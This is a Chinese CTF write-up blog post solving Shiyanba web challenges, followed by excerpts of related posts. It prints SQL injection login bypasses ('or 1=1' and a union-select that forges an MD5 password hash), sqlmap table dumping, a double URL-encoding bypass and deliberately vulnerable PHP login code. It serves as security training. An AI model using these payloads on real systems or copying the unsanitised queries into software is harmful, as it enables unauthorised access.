實驗吧CTF刷題記錄(web篇)

2021-07-28 05:12:05 字數 1267 閱讀 4040

1.這個看起來有點簡單

手工檢測是否存在sql注入

使用sqlmap爆出當前資料庫my_db 發現可能藏有key值的thiskey表 進一步爆出欄位k0y並得到key值。

檢視原始碼發現有隱藏鏈結

index.txt

登陸語句$sql = "select user from php where (user='$user') and (pw='$pass')";
if($row['user']=="admin")
可以看到存在管理員admin使用者,並使用or語句嘗試繞過登陸

admin' or 1=1)#

注意備份檔案

開啟鏈結發現 can you authenticate to this website? index.php.txt

於是進入index.php.txt頁面

$_get[id] = urldecode($_get[id]);

if($_get[id] == "hackerdj") ";

}

此處應該注意encode兩次(瀏覽器端+1次)

access granted!

flag: dutctf

第一次接觸到jother編碼  複製貼上到控制台enter彈出密碼繞過

if($_post[user] && $_post[pass])  

$user = $_post[user];

$pass = md5($_post[pass]);

$sql = "select pw from php where user='$user'";

$query = mysql_query($sql);

if (!$query)

$row = mysql_fetch_array($query, mysql_assoc);

//echo $row["pw"];

if (($row[pw]) && (!strcasecmp($pass, $row[pw])))

else

}

可以看到是使用post方式,pass是經過md5加密的。只需要構造row[pw]和pass加密後的的值相等就可以實現繞過,其中pass加密後的值我們可以通過輸入控制,從而達到不用驗證資料庫中的真實賬號密碼。

賬號框輸入:  ***' and 0=1 union select "202cb962ac59075b964b07152d234b70" # 密碼框輸入:123

保證md5與輸入的密碼相同即可 其中0=1可以使前面語句失效,從而實現繞過。

CTF實驗吧 WEB專題 4

題解 通過看成step1.php的源 發現是通過vim編寫的,一般的vim編寫可能會產生遺留問題,就是乙個備份檔案.swp,但是直接用似乎不行,然後我們通過抓包,傳送資料發現step2.php中要提交給另外乙個submit.php檔案,試一試.submit.php.swp是不是存在,ok,發現源 接...

CTF實驗吧 WEB專題 2

分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!題解 我們先單引號試一下發現報錯,所以基本存在注入,然後我們用空格會爆sqli detected 因此被過濾了,發現 還是 a0這些編碼都會報錯,所以只能用萬能空格替代 然後測試是否含有flag表,接著測試是否含有flag列,然而並沒有什麼卵用,因...

CTF題庫 實驗吧(密碼學)之綜合篇

各種密碼加密與解密 md5 查md5 chamd5.org 摩斯電碼 摩爾斯電碼 柵欄密碼 ctf題庫 實驗吧 部分題目詳解 ctf題庫 實驗吧 密碼學 之變異凱撒 ctf題庫 實驗吧 密碼學 之傳統知識 古典密碼 ctf題庫 實驗吧 密碼學 之try them all ctf題庫 實驗吧 密碼學 ...